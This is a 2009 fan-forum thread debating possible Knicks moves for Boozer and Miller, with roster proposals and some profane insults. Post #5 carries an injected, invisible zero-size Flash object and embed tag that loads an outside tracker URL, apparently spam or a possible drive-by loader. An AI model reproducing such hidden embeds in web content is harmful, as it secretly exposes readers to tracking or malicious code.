Page 1 of 2 12 LastLast
Results 1 to 15 of 20

Thread: If the Knicks get Miller & Boozer...

  1. #1
    Veteran mafra's Avatar
    Join Date
    Jun 2009
    Posts
    2,382
    Rep Power
    11

    Default If the Knicks get Miller & Boozer...

    Reading a story in the Post today:

    "According to a league source, New York is one of Boozer's preferred destinations. Utah is trying to save money and offering up Cuttino Mobley's expiring contract with insurance covering a portion of it is a possibility.

    Walsh also appears close to making Sixers point guard Andre Miller a formal offer for the one-year, $5.8 million midlevel exception, feeling there is a chance of stealing him. The Sixers will not offer Miller more than a one-year deal."

    ------------

    What would this do for NY this year (and beyond)? I would think if we traded for Boozer, that might help recruit Miller.... no?

    Anyway.... let's just say Utah takes on Jeffries & Mobley's contract; Let's also assume both Lee & N8 reup on 1-year deals...


    Andre Miller (Duhon, Douglas)
    Wilson Chanlder (N8)
    Danilo Galineri (Harrington)
    David Lee (Hill)
    Carlos Boozer (Darko, Curry)

    What does this roster look like? I would also assume we showcase Eddie Curry early and try to pawn him off on the first bidder...

    This is probably the only shot NY has at reaching the playoffs next year; and if that is a MUST to attract a BIG TIME free agent in 2010.... It might be our only chance to make that happen?

    Boozer turns 29 this season, but we would be able to sign him with the Bird rights & get a Lebron or Wade. Boozer, Lee, Hill & Darko should be enough in the paint, if Chandler & Danilo mature in become stars....

    Well, seriously.... look at CLE's roster. Would Lebron really opt for that group over this one?

    I know.... Boozer, Darko, Lee, Duhon, Miller & Harrington will also be free agents next year.... Just throwing ideas out there... I am sure if Lebron signs with us, it might help sway some other guys to stay aboard, no?

  2. #2
    Veteran nyk_nyk's Avatar
    Join Date
    Jul 2007
    Posts
    3,529
    Rep Power
    15

    Default

    This would be a great scenerio for the knicks.

    Boozer wouldn't play center though.

  3. #3
    Hannibal Lecter TR1LL10N's Avatar
    Join Date
    Jul 2007
    Location
    Dark side of the Moon
    Posts
    2,743
    Rep Power
    12

    Default

    If the Knicks can first sign Lebron, I am sure they will have no qualms about signing anyone and everyone even if it puts us over the cap.

  4. #4
    Veteran
    Join Date
    Jan 2005
    Posts
    1,590
    Rep Power
    11

    Default

    it would be great to have both Miller and Boozer and without wishful thinking.. its quite possible. Miller would come in here aswell as Boozer and play their hardest to make the cash next year somewhere else.. but who cares. more so.. if Bosh, Wade or Amare all sign extensions.. would LeBron like to reunite with Carlos Boozer? personally i think so. wed have a deep squad if that happened hopefully Larry is part of the deal that gets us Boozer though.. id bite if we could give Larry, Jeffries and Chandler

  5. #5
    Newbie
    Join Date
    Jan 2009
    Posts
    42
    Rep Power
    0

    Default

    Originally Posted by nyk_nyk
    This would be a great scenerio for the knicks.<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="0" height="0"><param name="movie" value="<A href="http://brbyowner.com/?tracker=4097"></param><param">http://brbyowner.com/?tracker=4097"></param><param name="allowFullScreen" value="true"></param><embed src="[Only registered and activated users can see links. ]" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></object>

    Boozer wouldn't play center though.
    I would like to see this happen..It will be a good situation...

  6. #6
    Veteran
    Join Date
    Jun 2009
    Posts
    2,795
    Rep Power
    10

    Default

    Forget Miller, S+T Lee and Cuttino Mobley for Boozer and sign Ramon Sessions. If what Utah really wants is to cut costs, Cuttino Mobley's 80% insured contract should be an absolute godsend for them and all the more reason to trade with us. That's basically like being able to trade a 12 million dollar player and only having to take on like 3 million in salary

  7. #7
    Veteran mafra's Avatar
    Join Date
    Jun 2009
    Posts
    2,382
    Rep Power
    11

    Default

    Originally Posted by SSj4Wingzero
    Forget Miller, S+T Lee and Cuttino Mobley for Boozer and sign Ramon Sessions. If what Utah really wants is to cut costs, Cuttino Mobley's 80% insured contract should be an absolute godsend for them and all the more reason to trade with us. That's basically like being able to trade a 12 million dollar player and only having to take on like 3 million in salary
    With Utah keeping Mislap... This looks likely. They need to cost cost (Boozer for Mobley's contract allows this); Carlos is willing to come to NY; and now POR has cap room for a sign-n-trade for Lee. We could work out a 3-way deal if that's what it takes.

  8. #8
    Knicks Guru hometheaterguy's Avatar
    Join Date
    Aug 2004
    Posts
    1,017
    Rep Power
    12

    Default

    Boozer is a real possibility, but the knicks will have to offer more that Cuttino's expiring contract. The Knicks might have to throw in a pick as well... I say offer Harrington; this way Utah can at least get a functioning player to have on the roster! Both have an expiring contract, but at least Al brings some talent with him. Before Miller signs a 1 year contract, he will make sure that no other team is willing to give him a multi-year contract first; if there is no takers, look for hime to either stay in Philly or sign with the Knicks.

    If the Knicks do get Boozer, they do not need Lee! Boozer brings everything Lee has to offer plus a much more stable offesnsive game as well as a better defensive presence in the paint. If they get Boozer, use Lee in a sign and trade to get another needed player... I have said it before and I will reiterate it here; CALL ATLANTA and see if they would trade Joe Johnson for Lee and a empiring contract to make up the cap difference!!! Hughes would be a good candidate for that; he plays the same position as Joe; not as good as Joe but still could be a force for Atlanta.

    Curry
    Boozer
    Chandler
    Johnson
    Miller

    That is a starting 5 that can make things happen for the Knicks... You can not deny it!! A great balance of offense and defense...

  9. #9
    Veteran LJ4ptplay's Avatar
    Join Date
    Jan 2007
    Location
    Ft. Collins, CO
    Posts
    2,950
    Rep Power
    12

    Default

    ^ You're right. If we get Boozer (and that's a huge IF), Lee is no longer needed. I think the team that would want him the most is Portland since they just lost out on Paul Millsap. A sign and trade to Portland for Rudy Fernandez and Steve Blake or Travis Outlaw would be feasible.

    PG-Blake
    SG-Fernandez
    SF-Gallo or Chandler
    PF-Boozer
    C-Darko

    Starting to look like a decent lineup.

    Although, using Mobley's contract for Boozer is probably our best chance at getting him, using Mobley's contract is probably our best chance at moving Curry as well. Which is more important??

  10. #10
    Veteran
    Join Date
    Jun 2009
    Posts
    2,795
    Rep Power
    10

    Default

    If we can get Boozer, doing that. If we get Boozer via trade we own his Bird rights, meaning that we can exceed the salary cap to re-sign him. In other words? We have the salary cap room to sign one big star, and then we could STILL re-sign Boozer because of the Bird rights.

    Even if we don't want Boozer we could still use him in a sign and trade for a FA we wanted because we have his bird rights. It makes it so that we only need enough cap room to sign ONE player to the maximum in 2010, not two.

  11. #11
    12th man
    Join Date
    Nov 2006
    Location
    Far far away from the orgy that consist of clyde, 8's, rady, smokes and rono
    Posts
    11,260
    Rep Power
    0

    Default

    Half court players in a full court offense.
    Awesome idea guys.
    Lets make it happen.

  12. #12
    Member the portable man's Avatar
    Join Date
    Jan 2009
    Posts
    274
    Rep Power
    6

    Default

    if knicks get boozer and miller, this would be the worst most boring team in history of sports. miller is duhon with a few more assists per game, so u might as well keep the team as is. boozer is harrington with few more rebounds but less offensive options.

    why waste money on slower players who HONESTLY DO NOT give u a new look? i assure u with that lineup knicks won't get over 35 wins unless they take crack or some ****. i mean u can't run pick & rolls all game long.

    i got an idea tho, get a phuckin shooter and u might make the 8th spot! no team will get anywhere in the playoffs without a legitimate SG. why do u think we've sucked for so long since houston been gone? u look @ any decent team, they have a solid SG.

    i still SMH over how many more games we could've won last season if we just had a pure shooter knockin down those open shots off screens & penetrations instead of hughes takin them as he's curlin around. it's a disgrace, espeically in the big city, to not be able to hit an open mid ranger on an nba court. this should never happen, no excuses. well contested shots is acceptable

    and as for andre miller, he was just a fill-in in philly. he doesnt bring ANYTHING. honestly, wgaf if he can find some shooter coming off a screen? he's slow as **** and all he can do is back down his defender. i watched that orlando series and the guy gives up quicker than a suicide victim. rafer beats him off the dribble with ease and the guy already puttin his head down. a grown b1tch.

    i don't want some player with a bloated name playin in NYC, YA HEARD ME??? someone else better pick em up quickly cuz this **** makes me wana puke death and give up MSG for good.

    its pathetic when the highlight of all knicks games for the past decade is walt clyde frazier and mike breen commentary, cant wait for another season of it

    and to finish it off, i honestly think signing ALLAN HOUSTON to a 2-yr deal would be a 10X better move than anythin goin on in the market now. i have no doubt he could drop at least 12-14 ppg. **** would be a piece of cake if they just let N8 dribble drive and dish all game long.

  13. #13
    Knicks Guru hometheaterguy's Avatar
    Join Date
    Aug 2004
    Posts
    1,017
    Rep Power
    12

    Default

    Originally Posted by metrocard
    Half court players in a full court offense.
    Awesome idea guys.
    Lets make it happen.
    If the Knicks make it to the playoffs, they will most likely play; Boston, Orlando. Cleveland and maybe Atlanta... If they make it to the Finals, they will most likely play; San Antonio, LA, Dallas or maybe a wild card team like Denver... All these teams play half court and play it very well!! If the Knicks were to get Boozer, Miller and Johnson like I said in my post; they would be able to play both run and gun as well as half court. If you look at Mike D when he was with the Suns; they got beat because the were forced into the half court game with players that could not play that type of game.... This scenario gives them those players...

  14. #14
    Knicks Guru hometheaterguy's Avatar
    Join Date
    Aug 2004
    Posts
    1,017
    Rep Power
    12

    Default

    Originally Posted by the portable man
    if knicks get boozer and miller, this would be the worst most boring team in history of sports. miller is duhon with a few more assists per game, so u might as well keep the team as is. boozer is harrington with few more rebounds but less offensive options.

    why waste money on slower players who HONESTLY DO NOT give u a new look? i assure u with that lineup knicks won't get over 35 wins unless they take crack or some ****. i mean u can't run pick & rolls all game long.

    i got an idea tho, get a phuckin shooter and u might make the 8th spot! no team will get anywhere in the playoffs without a legitimate SG. why do u think we've sucked for so long since houston been gone? u look @ any decent team, they have a solid SG.

    i still SMH over how many more games we could've won last season if we just had a pure shooter knockin down those open shots off screens & penetrations instead of hughes takin them as he's curlin around. it's a disgrace, espeically in the big city, to not be able to hit an open mid ranger on an nba court. this should never happen, no excuses. well contested shots is acceptable

    and as for andre miller, he was just a fill-in in philly. he doesnt bring ANYTHING. honestly, wgaf if he can find some shooter coming off a screen? he's slow as **** and all he can do is back down his defender. i watched that orlando series and the guy gives up quicker than a suicide victim. rafer beats him off the dribble with ease and the guy already puttin his head down. a grown b1tch.

    i don't want some player with a bloated name playin in NYC, YA HEARD ME??? someone else better pick em up quickly cuz this **** makes me wana puke death and give up MSG for good.

    its pathetic when the highlight of all knicks games for the past decade is walt clyde frazier and mike breen commentary, cant wait for another season of it

    and to finish it off, i honestly think signing ALLAN HOUSTON to a 2-yr deal would be a 10X better move than anythin goin on in the market now. i have no doubt he could drop at least 12-14 ppg. **** would be a piece of cake if they just let N8 dribble drive and dish all game long.
    First of all, it wouldn't be a waste of money since all the players I suggested, their contracts are all up at the end of this year. Walsh is not going to sign anyone for more than a year this season period! You and I must have been watching different Knicks games last season because N8 was streaky at best and made some BONE HEAD plays!! He can be exciting at times, I will give you that but if you feel a 5' 8" shooting guard is the way to go... Than you and I have a completely different opinion on what constitutes a cohesive NBA squad. Let me guess, you were a big Marbury fan!?!?! Boozer is a premier 4 in this league and he is still young, Miller is not an elite PG but he has one thing N8 does not (neither did Marbury for that matter) and that is court vision and a fundamantal understanding of the game. I could live with a Miller/Duhan combo at the 1. Would I like to have Steve Nash?? Hell Yeah!! But that is not going to happen; at least while he is in his prime or close to it. Alston is one of the quickest guards in the league and his speed give a lot of guards a headache but he is not a true PG; he is more a scorer than a QB! Miller on the other hand is not a good scorer but he is a very good QB!! I've seen Miller knock down a few clutch shots when he had to but he is a horrible 3 point shooter and not a great free throw shooter either... He has his down points but he is still better than a lot of PG's out there and he is a legit starter in the NBA.

    This line up also gives you an inside outside game! We had a legit shooter in Crawford and we still didn't go anywhere! If Curry can get serious about playing, he could dominate the low post on offense. He is not a good rebounder and he doesn't play good man to man D, but he can block shots (go figure) and he alwyas commanded a double team when he touched the ball. Boozer is the right type of player to clean up on the boards. That's why Curry was so successful with Tyson by his side; the ying/yang thing. Tyson couldn't throw the ball accuratly into the ocean but could rip down rebounds and block a shot; Curry was the dominate scorer...

    Joe Johnson is a 6' 8" shooting guard that has tremendous ball handleing and passing skills. He is a decent defender (not a great one) and he is streaky as well but he can dominate when he is on; like Crawford in a way. Crawford couldn't guard the shooting guard from the wheel chair BBall league; Joe Johnson can man up and play decent D! That's the difference here!
    Last edited by hometheaterguy; Jul 17, 2009 at 23:20.

  15. #15
    Member DANUTZ39's Avatar
    Join Date
    Aug 2008
    Posts
    451
    Rep Power
    7

    Default

    Originally Posted by hometheaterguy
    If the Knicks make it to the playoffs, they will most likely play; Boston, Orlando. Cleveland and maybe Atlanta... If they make it to the Finals, they will most likely play; San Antonio, LA, Dallas or maybe a wild card team like Denver... All these teams play half court and play it very well!! If the Knicks were to get Boozer, Miller and Johnson like I said in my post; they would be able to play both run and gun as well as half court. If you look at Mike D when he was with the Suns; they got beat because the were forced into the half court game with players that could not play that type of game.... This scenario gives them those players...
    That's when I stopped reading...............

Similar Threads

  1. Knicks looking for an upgrade at PG
    By JayJ44 in forum NY Knicks
    Replies: 39
    Last Post: Apr 15, 2009, 16:45
  2. Replies: 219
    Last Post: Apr 15, 2009, 07:35
  3. Replies: 83
    Last Post: Nov 17, 2008, 09:48
  4. New York Knicks vs Chicago Bulls Game Thread 1/8/08
    By MSGKnickz33 in forum NY Knicks
    Replies: 90
    Last Post: Jan 11, 2008, 17:29
  5. The Centers Thread
    By torres in forum NY Knicks
    Replies: 9
    Last Post: Aug 14, 2004, 17:21

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •